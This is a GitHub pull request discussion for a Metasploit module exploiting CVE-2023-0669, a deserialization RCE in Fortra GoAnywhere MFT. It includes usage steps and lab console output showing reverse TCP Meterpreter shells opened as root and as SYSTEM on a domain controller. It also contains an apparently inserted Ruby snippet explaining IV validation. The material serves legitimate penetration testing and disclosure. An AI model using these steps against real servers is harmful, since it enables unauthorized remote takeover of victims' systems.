
Fortra deserialization RCE CVE-2023-0669 (ETR) #17607

Merged

Conversation

rbowes-r7
Contributor

@rbowes-r7 rbowes-r7 commented Feb 6, 2023

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669
  • set LHOST / set RHOST / exploit
  • You should get a shell

I included a documentation file with lots of info / examples. LMK if you need the software (a copy should be on our vulnerable software drive).

Cheers!

@smcintyre-r7 smcintyre-r7 self-assigned this Feb 7, 2023
@rbowes-r7
Contributor Author

Thanks, Spencer! Fixed both of those comments

@rbowes-r7
Contributor Author

Your changes are great, and work fine. Thanks! Merged in

@smcintyre-r7
Contributor

Working like a champ on windows and linux now. I'll get this landed in a second.

Testing Output
msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669 
show o	
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > show options 

Module options (exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669):

   Name       Current Setting         Required  Description
   ----       ---------------         --------  -----------
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      8001                    yes       The target port (TCP)
   SSL        true                    no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /goanywhere/lic/accept  yes       Unsafe deserialization endpoint
   VHOST                              no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Version 2 Encryption



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 192.168.159.9
RHOSTS => 192.168.159.9
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > run

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Sending stage (24380 bytes) to 192.168.250.237
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.237:64834) at 2023-02-08 12:53:56 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : localhost.localdomain
OS              : Linux 3.10.0-1160.81.1.el7.x86_64 #1 SMP Fri Dec 16 17:29:43 UTC 2022
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Sending stage (175686 bytes) to 192.168.159.10
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.10:55070) at 2023-02-08 12:54:28 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x86/windows
meterpreter > background 
[*] Backgrounding session 2...
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set EncryptionIv fooo
[-] The following options failed to validate: Value 'fooo' is not valid for option 'EncryptionIv'.
EncryptionIv => 4145532f4342432f504b435335506164
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set EncryptionIv 4145532f4342432f504b4353355061644141
EncryptionIv => 4145532f4342432f504b4353355061644141
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[-] Msf::OptionValidateError The following options failed to validate:
[-] Invalid option EncryptionIv: The encryption IV is not the correct length (is: 18, should be: 16).
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > 
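The two EncryptionIv failures in the session above (a non-hex value rejected as soon as the option is set, and a hex value of the wrong length rejected at run time) come down to one requirement: the IV must hex-decode to exactly one 16-byte AES block. The following is an added example, not the module's own code; the function names, the DEFAULT_IV_HEX constant and the exact message strings are assumptions modelled on the output shown above.

```ruby
# Added example (not the module's own code): validate an AES-CBC IV supplied
# as a hex string, reproducing the two rejections seen in the session above.

# Default IV shown in the session above (the hex encoding of "AES/CBC/PKCS5Pad").
DEFAULT_IV_HEX = '4145532f4342432f504b435335506164'.freeze
AES_BLOCK_BYTES = 16

# Option-level check: only a non-empty, even-length string of hex digits is
# accepted, which is why 'fooo' is refused before anything is decoded.
def valid_hex_option?(value)
  value.is_a?(String) && !value.empty? && value.length.even? && value.match?(/\A\h+\z/)
end

# Run-time check: decode the hex and require exactly one AES block.
# Returns [bytes, nil] on success or [nil, message] on failure.
def validate_iv(hex)
  return [nil, "Value '#{hex}' is not valid for option 'EncryptionIv'."] unless valid_hex_option?(hex)

  bytes = [hex].pack('H*')
  if bytes.bytesize != AES_BLOCK_BYTES
    return [nil, "The encryption IV is not the correct length (is: #{bytes.bytesize}, should be: #{AES_BLOCK_BYTES})."]
  end

  [bytes, nil]
end

if __FILE__ == $PROGRAM_NAME
  # Constructed candidates: the bad value, the default, and the 18-byte value
  # from the session above.
  ['fooo', DEFAULT_IV_HEX, DEFAULT_IV_HEX + '4141'].each do |candidate|
    bytes, err = validate_iv(candidate)
    puts(err || "#{candidate} -> #{bytes.inspect}")
  end
end
```

Doing the length check at run time rather than at option-set time matches the session output: a 36-character hex string passes the option validator but still cannot serve as a CBC IV, so the module reports the decoded byte count and aborts without sending anything.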

@smcintyre-r7 smcintyre-r7 added the module, docs and rn-modules (release notes for new or majorly enhanced modules) labels Feb 8, 2023
@smcintyre-r7 smcintyre-r7 merged commit c997952 into rapid7:master Feb 8, 2023
@todb
Contributor

todb commented Feb 8, 2023

CVE-2023-0669 references updated.

@stevenseeley
Contributor

stevenseeley commented Feb 8, 2023

Nice work; however, I think it’s fair to put Fryco as a reference since he found it in 2021: https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html

@rbowes-r7
Contributor Author

Oh yeah, not a bad idea! I put him on the AttackerKB already

@todb
Contributor

todb commented Feb 8, 2023

Oh for sure! Done.

@h00die-gr3y
Contributor

Please check the documentation.
It still refers to msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) instead of msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669).

@jmartin-tech
Contributor

Release Notes

This adds an exploit targeting CVE-2023-0669, a pre-authentication deserialization vulnerability that affects Fortra GoAnywhere MFT.
